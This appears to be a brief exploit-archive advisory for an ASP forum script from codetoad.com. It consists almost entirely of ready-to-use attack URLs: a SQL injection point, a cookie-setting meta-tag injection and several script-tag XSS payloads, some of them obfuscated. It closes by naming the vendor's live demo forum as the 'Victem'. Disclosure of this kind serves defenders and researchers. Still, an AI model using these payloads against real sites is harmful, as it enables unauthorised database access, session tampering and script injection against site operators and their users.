#########################################################
---------------------------------------------------------
Portal Name: ASP Forum Script
Vendor : http://codetoad.com/demos/forum/
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (CM,XSS,SQL)
---------------------------------------------------------
#########################################################
[SQL]:
http://site.com/[Path]/messages.asp?forum_id=3&message_id=[SQL]
1=1
[Cookie Manipulation]:
http://site.com/[Path]/new_message.asp?topic_id=0&message_id=0&forum_id=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'
>
[XSS]:
http://site.com/[Path]/messages.asp?forum_id=>'><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&message_id=197
http://site.com/[Path]/new_message.asp?topic_id=0&message_id=0&forum_id=<script>alert(1369)</script
>
http://site.com/[Path]/default.asp?>"'><ScRiPt>alert(1369)</ScRiPt>
---------------------------------
Victem :
http://codetoad.com/demos/forum